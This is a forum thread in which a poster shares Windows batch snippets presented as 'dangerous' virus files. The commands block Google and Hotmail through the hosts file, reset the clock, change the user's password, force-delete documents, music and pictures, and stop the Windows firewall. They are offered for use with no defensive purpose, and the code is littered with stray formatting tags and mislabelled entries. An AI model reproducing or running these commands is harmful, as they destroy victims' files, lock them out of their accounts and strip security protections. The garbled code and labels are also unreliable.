🔒 Closed Some of most dangerous .bat files

Status
Not open for further replies.

AraAra

Honorary Poster
Some of these codes are very dangerous!
USE THIS AT YOUR OWN RISK.

Block Google

Code:
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 http://www.google.com >> "Hosts"

Black Hotmail
Code:
@echo off[/B][/B][/B][/B][/B][/B]
[B][B][B][B][B][B]::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 http://www.hotmail.com >> "Hosts"
::---------------------------::

Change time to 00.00
Code:
::__---Virus Created By Virus Author---__::[/B][/B][/B][/B]
[B][B][B][B]@echo off
::------Change The Time------::
time 00:00
::---------------------------::

Change user pass
Code:
@echo off[/B][/B][/B][/B]
[B][B][B][B]::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::

Create account Owned
Code:
@echo off[/B][/B][/B][/B]
[B][B][B][B]::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::

Delete all Docs
Code:
@echo off[/B][/B][/B]
[B][B][B]::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::

Delete all Music
Code:
@echo off[/B][/B][/B]
[B][B][B]::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::

Delete all Pics
Code:
@echo off[/B][/B][/B]
[B][B][B]::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::

Disable Farewell
Code:
@echo off[/B][/B][/B]
[B][B][B]::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::

There be more but I'm tired of typing..:):)
 
Status
Not open for further replies.

About this Thread

  • 5
    Replies
  • 823
    Views
  • 6
    Participants
Last reply from:
zon28

Trending Topics

Online now

Members online
1,007
Guests online
1,254
Total visitors
2,261

Forum statistics

Threads
2,278,189
Posts
28,981,453
Members
1,228,259
Latest member
Shao Kahn
Back
Top